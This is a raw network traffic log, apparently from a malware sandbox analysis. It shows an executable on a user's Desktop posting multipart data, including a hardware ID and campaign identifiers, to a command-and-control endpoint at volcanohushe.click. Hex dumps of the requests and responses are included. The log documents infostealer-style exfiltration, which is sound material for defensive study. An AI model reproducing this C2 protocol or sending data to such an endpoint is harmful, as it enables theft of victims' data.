                                                                                Data Ascii: qkTOPGsmQoIsJzz0gNtCAXBUeaiJgNOLq7Vmc5tnyFc91w4/OTRWACl36WcJmsTDssT3qQsBkI7487F3S2QKB2lFnWzrNBST/CcmoUiLCkFxR3Ut2gSByGuzduXddggFKoZOvzm2U8FpNSlkTthGAbHG9msJglBMeXB0dcskm1S7xstvbSXfgik0aTQHG0SCMwFk75mFAk/4oqPlyGRLRelGDX64dJJCKvRrJgnaRgKwh7VoS8JTCrrw9vbbdZt
                                                                                2024-12-27 07:15:09 UTC1369INData Raw: 76 6b 72 4e 42 47 54 2f 43 63 6f 70 73 37 59 42 49 50 78 68 58 62 70 69 59 41 51 6a 37 6c 7a 64 44 52 49 4a 41 67 47 61 77 64 4d 66 66 2b 31 45 45 46 70 64 62 72 33 47 6c 70 42 45 61 54 55 2f 53 74 41 52 31 53 4b 76 69 4b 79 4a 6b 30 32 43 6f 51 37 30 52 31 2f 75 50 65 52 51 65 67 30 36 53 57 4a 32 67 61 43 38 34 63 32 62 4d 67 41 30 51 7a 34 63 48 46 31 79 43 63 49 52 69 6e 46 7a 2b 39 6f 70 64 4e 46 2b 69 45 36 36 63 6b 59 52 77 46 33 56 50 4d 37 7a 46 4e 54 6a 53 75 6b 70 66 62 49 35 67 69 45 4b 4d 58 50 66 7a 67 32 55 30 4b 6f 64 53 6a 67 43 68 71 46 41 66 46 48 4e 4b 6c 4c 51 68 4e 50 2b 72 4d 32 4a 64 6a 32 43 6f 45 37 30 52 31 30 73 76 69 43 43 36 53 6e 4c 54 63 4d 43 34 62 43 6f 74 4c 6b 36 30 72 41 55 45 33 36 4d 50 62 33 53 53 54 49 52 65 72 45
                                                                                Data Ascii: vkrNBGT/Ccops7YBIPxhXbpiYAQj7lzdDRIJAgGawdMff+1EEFpdbr3GlpBEaTU/StAR1SKviKyJk02CoQ70R1/uPeRQeg06SWJ2gaC84c2bMgA0Qz4cHF1yCcIRinFz+9opdNF+iE66ckYRwF3VPM7zFNTjSukpfbI5giEKMXPfzg2U0KodSjgChqFAfFHNKlLQhNP+rM2Jdj2CoE70R10sviCC6SnLTcMC4bCotLk60rAUE36MPb3SSTIRerE
                                                                                2024-12-27 07:15:09 UTC1369INData Raw: 59 53 77 36 75 7a 71 79 62 4f 32 41 52 43 63 4d 62 32 71 41 73 43 45 51 2b 34 73 44 57 30 43 4f 57 4a 56 7a 68 58 44 4c 6c 72 49 38 4b 4c 72 6a 48 75 59 51 6b 54 78 45 4a 69 77 79 64 75 47 67 4b 52 58 69 32 69 74 37 46 4b 5a 55 2f 46 61 67 53 4f 76 37 2b 31 6b 63 45 75 74 75 6b 6c 69 35 69 47 67 6e 4e 45 74 61 72 4a 41 70 4d 4d 2b 48 47 6c 35 6c 74 6e 7a 56 63 39 31 77 62 39 76 2f 41 53 51 47 6a 79 72 44 53 4e 69 41 46 52 73 77 66 6b 2f 6c 6f 44 6b 49 7a 36 73 72 62 31 79 6d 56 4c 51 36 67 47 7a 4c 30 35 38 56 41 43 4b 2f 58 6f 35 6b 6d 61 41 34 4b 78 51 48 57 73 7a 70 4e 42 33 6a 70 30 70 65 50 62 61 34 71 44 4c 38 66 64 38 7a 36 31 46 77 45 70 64 44 72 6a 57 64 33 58 41 48 48 55 34 76 68 4c 67 4a 41 4f 2b 48 4c 33 74 73 67 6e 53 51 5a 72 68 6f 78 39 2b
                                                                                Data Ascii: YSw6uzqybO2ARCcMb2qAsCEQ+4sDW0COWJVzhXDLlrI8KLrjHuYQkTxEJiwyduGgKRXi2it7FKZU/FagSOv7+1kcEutukli5iGgnNEtarJApMM+HGl5ltnzVc91wb9v/ASQGjyrDSNiAFRswfk/loDkIz6srb1ymVLQ6gGzL058VACK/Xo5kmaA4KxQHWszpNB3jp0pePba4qDL8fd8z61FwEpdDrjWd3XAHHU4vhLgJAO+HL3tsgnSQZrhox9+
                                                                                2024-12-27 07:15:09 UTC1369INData Raw: 36 4d 50 6c 69 32 6c 70 45 45 61 54 55 39 43 6d 4b 77 78 44 4d 65 4c 46 30 4e 4d 2f 6b 69 6f 4f 72 68 30 2b 38 4f 44 58 52 77 4b 69 33 61 4b 66 4a 57 4d 62 41 63 51 57 6b 2b 39 6f 43 6c 46 34 74 6f 72 32 32 69 61 55 64 6b 62 76 41 33 76 6b 72 4e 42 47 54 2f 43 63 71 35 67 73 5a 42 45 46 78 42 44 42 6f 43 34 66 53 54 58 6b 32 4e 33 63 4b 4a 55 67 45 61 77 61 4d 2f 62 67 78 55 4d 50 71 39 66 72 33 47 6c 70 42 45 61 54 55 2f 43 32 50 67 64 4f 4e 50 6a 42 31 74 51 37 6c 54 31 63 34 56 77 6b 2b 76 32 58 45 68 6d 34 79 36 79 4e 5a 33 64 63 41 63 64 54 69 2b 45 75 42 45 38 2f 36 4d 54 46 30 69 75 58 49 68 57 6d 47 44 33 2b 37 4e 4e 4f 43 4b 33 66 70 35 6b 75 62 52 4d 43 77 68 33 61 72 6d 68 44 43 54 2f 32 69 6f 2b 58 44 49 4d 75 45 4b 4a 63 4b 72 50 31 6c 30 30
                                                                                Data Ascii: 6MPli2lpEEaTU9CmKwxDMeLF0NM/kioOrh0+8ODXRwKi3aKfJWMbAcQWk+9oClF4tor22iaUdkbvA3vkrNBGT/Ccq5gsZBEFxBDBoC4fSTXk2N3cKJUgEawaM/bgxUMPq9fr3GlpBEaTU/C2PgdONPjB1tQ7lT1c4Vwk+v2XEhm4y6yNZ3dcAcdTi+EuBE8/6MTF0iuXIhWmGD3+7NNOCK3fp5kubRMCwh3armhDCT/2io+XDIMuEKJcKrP1l00
                                                                                2024-12-27 07:15:09 UTC1369INData Raw: 39 4a 78 4c 6a 77 4e 33 52 62 55 74 32 6f 34 53 6a 62 67 7a 63 47 58 4d 71 64 6a 58 4b 41 47 64 61 58 56 7a 67 6f 49 70 4a 7a 7a 30 6a 78 70 48 41 48 52 42 64 53 74 4f 51 5a 45 4e 4d 7a 46 30 4d 45 75 6c 79 34 4e 70 6c 41 2b 38 4b 79 5a 43 67 69 77 6e 50 50 53 42 6d 6b 4b 42 65 51 51 77 71 68 6f 51 77 6b 2f 2b 49 71 50 6c 78 50 59 50 78 2b 2f 48 7a 72 73 30 70 63 53 46 70 61 63 6f 49 51 75 66 68 38 51 77 42 37 66 73 42 5a 4e 45 57 79 38 6d 49 57 46 66 34 64 74 41 35 42 53 64 66 79 73 6a 33 4d 57 36 4d 72 72 79 6e 73 67 58 42 53 4c 53 35 50 6d 4b 78 39 62 50 75 33 63 31 4a 41 54 70 67 6f 4b 70 52 73 6c 2b 76 76 59 43 6b 48 6f 30 2b 76 4b 45 43 34 56 41 64 41 43 78 61 77 34 43 67 6b 48 6f 49 72 50 6c 33 58 59 47 42 2b 68 45 6a 4c 72 2f 5a 70 74 47 61 4c 62
                                                                                Data Ascii: 9JxLjwN3RbUt2o4SjbgzcGXMqdjXKAGdaXVzgoIpJzz0jxpHAHRBdStOQZENMzF0MEuly4NplA+8KyZCgiwnPPSBmkKBeQQwqhoQwk/+IqPlxPYPx+/Hzrs0pcSFpacoIQufh8QwB7fsBZNEWy8mIWFf4dtA5BSdfysj3MW6MrrynsgXBSLS5PmKx9bPu3c1JATpgoKpRsl+vvYCkHo0+vKEC4VAdACxaw4CgkHoIrPl3XYGB+hEjLr/ZptGaLb
                                                                                2024-12-27 07:15:09 UTC1369INData Raw: 38 52 43 59 63 64 32 4b 45 76 48 56 38 6a 6f 73 4c 55 7a 54 65 6d 45 7a 65 6a 47 6a 4c 6e 36 39 46 73 4c 2b 69 53 36 35 31 70 4e 69 56 47 67 31 50 73 37 32 67 56 43 57 43 75 2f 39 54 5a 49 35 38 37 44 65 49 30 46 73 66 57 6c 57 59 49 76 5a 36 66 6c 54 6c 2f 46 77 76 48 55 35 33 68 4c 6b 30 52 61 4b 43 4b 30 38 5a 74 77 48 31 4f 39 45 6c 6d 71 72 79 46 56 55 47 78 6e 4c 33 53 63 54 78 53 52 74 6c 54 69 2b 46 76 44 6c 73 71 36 4d 6e 42 31 47 71 6d 45 7a 75 68 47 7a 54 72 2f 4d 42 46 4d 5a 62 4a 71 4a 77 6e 61 51 6f 58 69 31 32 54 72 6d 68 56 63 48 69 6d 69 75 69 5a 62 59 42 74 52 4f 38 70 4e 76 50 69 30 46 77 65 35 66 75 6c 6c 53 68 34 44 42 48 45 55 35 33 68 4c 6b 30 52 61 71 43 4b 30 38 5a 74 77 48 31 4f 39 45 6c 6d 71 72 79 46 56 55 47 78 6e 4c 33 53 63
                                                                                Data Ascii: 8RCYcd2KEvHV8josLUzTemEzejGjLn69FsL+iS651pNiVGg1Ps72gVCWCu/9TZI587DeI0FsfWlWYIvZ6flTl/FwvHU53hLk0RaKCK08ZtwH1O9ElmqryFVUGxnL3ScTxSRtlTi+FvDlsq6MnB1GqmEzuhGzTr/MBFMZbJqJwnaQoXi12TrmhVcHimiuiZbYBtRO8pNvPi0Fwe5fullSh4DBHEU53hLk0RaqCK08ZtwH1O9ElmqryFVUGxnL3Sc
                                                                                2024-12-27 07:15:09 UTC1369INData Raw: 45 46 4a 47 42 4c 78 74 4b 65 4b 43 4b 32 35 64 31 32 43 77 57 76 78 45 36 2b 71 44 51 55 41 6a 6f 6b 75 75 63 61 54 5a 63 42 38 45 44 33 71 34 76 51 55 38 32 34 49 72 49 6d 54 54 59 4f 31 7a 33 54 33 75 39 2f 70 63 53 54 2b 2f 66 75 59 41 76 62 51 6f 46 6a 43 33 74 6a 44 6f 4b 57 54 75 73 2b 39 72 54 4f 34 30 75 44 4b 67 69 43 39 44 2b 30 46 6f 4d 36 75 32 39 6b 53 6c 67 47 30 61 46 55 38 76 68 63 45 31 6b 4b 75 6e 61 31 4a 64 6a 32 43 46 63 39 31 77 34 37 2b 76 48 53 55 4f 76 78 71 7a 53 4e 69 41 46 52 74 31 54 69 2f 4a 6d 54 56 74 34 74 6f 71 51 32 53 43 5a 4c 68 4b 73 44 69 66 37 37 38 46 4a 53 4a 62 69 68 6f 41 75 66 68 39 45 2b 68 37 58 74 7a 30 4f 57 54 2f 51 39 50 72 46 4b 6f 67 75 58 6f 4d 62 4f 50 48 53 36 58 30 65 72 38 7a 70 74 43 70 34 48 30
                                                                                Data Ascii: EFJGBLxtKeKCK25d12CwWvxE6+qDQUAjokuucaTZcB8ED3q4vQU824IrImTTYO1z3T3u9/pcST+/fuYAvbQoFjC3tjDoKWTus+9rTO40uDKgiC9D+0FoM6u29kSlgG0aFU8vhcE1kKuna1Jdj2CFc91w47+vHSUOvxqzSNiAFRt1Ti/JmTVt4toqQ2SCZLhKsDif778FJSJbihoAufh9E+h7Xtz0OWT/Q9PrFKoguXoMbOPHS6X0er8zptCp4H0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.949719104.21.71.1554437580C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 07:15:10 UTC284OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=4WYAIWBAUVIRYKPM89
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 12848
                                                                                Host: volcanohushe.click
                                                                                2024-12-27 07:15:10 UTC12848OUTData Raw: 2d 2d 34 57 59 41 49 57 42 41 55 56 49 52 59 4b 50 4d 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 46 41 37 37 45 42 41 45 42 32 43 43 42 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 34 57 59 41 49 57 42 41 55 56 49 52 59 4b 50 4d 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 57 59 41 49 57 42 41 55 56 49 52 59 4b 50 4d 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 63 33 52 6c 64
                                                                                Data Ascii: --4WYAIWBAUVIRYKPM89Content-Disposition: form-data; name="hwid"F72FA77EBAEB2CCB8246926E533C64D7--4WYAIWBAUVIRYKPM89Content-Disposition: form-data; name="pid"2--4WYAIWBAUVIRYKPM89Content-Disposition: form-data; name="lid"pqZnKP--c3Rld
                                                                                2024-12-27 07:15:12 UTC1135INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 07:15:12 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=p7f2lrnhatfidn140h5m9mn9f9; expires=Tue, 22 Apr 2025 01:01:50 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J89GoL8uAN%2FGOi66wvKgUFJwbwttryCTod%2FkPoZ5Vuc0Xll8iz%2Bqx0VTDYzo8JgAxTi3NXwFSqeJYnq41lEyir%2FkXuQMTd%2BfaCRuYJkolxzslBfPhNxZQx8Boyq1xnwnjgoJGho%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f878499fec043c2-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1645&rtt_var=619&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13790&delivery_rate=1764350&cwnd=162&unsent_bytes=0&cid=cd48d53b1be3708b&ts=1386&x=0"
                                                                                2024-12-27 07:15:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-27 07:15:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.949725104.21.71.1554437580C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 07:15:13 UTC274OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=3V7OYQ7S
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 15006
                                                                                Host: volcanohushe.click
                                                                                2024-12-27 07:15:13 UTC15006OUTData Raw: 2d 2d 33 56 37 4f 59 51 37 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 46 41 37 37 45 42 41 45 42 32 43 43 42 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 33 56 37 4f 59 51 37 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 56 37 4f 59 51 37 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 63 33 52 6c 64 33 64 7a 0d 0a 2d 2d 33 56 37 4f 59 51 37 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                Data Ascii: --3V7OYQ7SContent-Disposition: form-data; name="hwid"F72FA77EBAEB2CCB8246926E533C64D7--3V7OYQ7SContent-Disposition: form-data; name="pid"2--3V7OYQ7SContent-Disposition: form-data; name="lid"pqZnKP--c3Rld3dz--3V7OYQ7SContent-Dispo
                                                                                2024-12-27 07:15:15 UTC1131INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 07:15:14 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=mv891dei7gukp3vv3u689su3s0; expires=Tue, 22 Apr 2025 01:01:53 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHowQUfLw2AgA1PzligxUJWm%2Bzt8w6gIo6RONhGuhf3sv%2FltI%2Bt8lbiGCrFK7MdvD4Cu335PderfbfrXKQr97OmDo4dkM9bHu8vgsRAuVorr3IbCUIDEgFV8j3U9L35N82vPmks%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f8784acf9964276-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1591&rtt_var=623&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2842&recv_bytes=15938&delivery_rate=1718658&cwnd=208&unsent_bytes=0&cid=2d7cf577fa1566bf&ts=971&x=0"
                                                                                2024-12-27 07:15:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-27 07:15:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.949731104.21.71.1554437580C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 07:15:16 UTC282OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=VJ30NNYZ15CBSK94
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 20570
                                                                                Host: volcanohushe.click
                                                                                2024-12-27 07:15:16 UTC15331OUTData Raw: 2d 2d 56 4a 33 30 4e 4e 59 5a 31 35 43 42 53 4b 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 46 41 37 37 45 42 41 45 42 32 43 43 42 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 56 4a 33 30 4e 4e 59 5a 31 35 43 42 53 4b 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 4a 33 30 4e 4e 59 5a 31 35 43 42 53 4b 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 63 33 52 6c 64 33 64 7a 0d 0a 2d
                                                                                Data Ascii: --VJ30NNYZ15CBSK94Content-Disposition: form-data; name="hwid"F72FA77EBAEB2CCB8246926E533C64D7--VJ30NNYZ15CBSK94Content-Disposition: form-data; name="pid"3--VJ30NNYZ15CBSK94Content-Disposition: form-data; name="lid"pqZnKP--c3Rld3dz-
                                                                                2024-12-27 07:15:16 UTC5239OUTData Raw: d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                Data Ascii: |lQJ$nInVZ+?:us}Q0u?4E([:s~
                                                                                2024-12-27 07:15:18 UTC1140INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 07:15:18 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=crogeg16iogvu2f9f8mjm3n9ov; expires=Tue, 22 Apr 2025 01:01:56 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ilQAiOsmWB0StBDnvWJ0NjuWLP2Hb%2Bu86ScuQ5Q3zAq30rv0ONlFBgHbEIpAM%2BD%2Fc%2BMMy4OnIMGSV%2BgrRwEuN37MfTpC96I3OZFDjsz%2B6bZpDJE9FbiY%2Bd1x7N6BamgBRftd0E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f8784bdfddc42ef-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1620&rtt_var=608&sent=14&recv=27&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21532&delivery_rate=1796923&cwnd=221&unsent_bytes=0&cid=96636d601d572863&ts=1573&x=0"
                                                                                2024-12-27 07:15:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-27 07:15:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.949742104.21.71.1554437580C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 07:15:19 UTC277OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=AQ6UQNRMT0LZ
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 1198
                                                                                Host: volcanohushe.click
                                                                                2024-12-27 07:15:19 UTC1198OUTData Raw: 2d 2d 41 51 36 55 51 4e 52 4d 54 30 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 46 41 37 37 45 42 41 45 42 32 43 43 42 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 41 51 36 55 51 4e 52 4d 54 30 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 51 36 55 51 4e 52 4d 54 30 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 63 33 52 6c 64 33 64 7a 0d 0a 2d 2d 41 51 36 55 51 4e 52 4d 54 30 4c
                                                                                Data Ascii: --AQ6UQNRMT0LZContent-Disposition: form-data; name="hwid"F72FA77EBAEB2CCB8246926E533C64D7--AQ6UQNRMT0LZContent-Disposition: form-data; name="pid"1--AQ6UQNRMT0LZContent-Disposition: form-data; name="lid"pqZnKP--c3Rld3dz--AQ6UQNRMT0L
                                                                                2024-12-27 07:15:20 UTC1131INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 07:15:20 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=je2jh5t2rgovdi3qpm20jmhv1o; expires=Tue, 22 Apr 2025 01:01:59 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OIO4Kn4SO4HtbpOlcciB8w2iiOeXeB6wMZ1F5aV1mMb%2BK8HNbd8fgz%2FqI7D0O0QCmKIR0%2FlxyHtrUHeJjOKaX21ceecXIdNb%2FLIbSRXxsBVMiHIicddd4j54Ktr29R6LA1wfyAU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f8784d24c6c43bc-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2061&min_rtt=2052&rtt_var=789&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2111&delivery_rate=1370248&cwnd=221&unsent_bytes=0&cid=ea9b7c04fb62f686&ts=1107&x=0"
                                                                                2024-12-27 07:15:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-27 07:15:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.949750104.21.71.1554437580C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 07:15:22 UTC280OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=9NJQ355O5H0TX
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 569831
                                                                                Host: volcanohushe.click
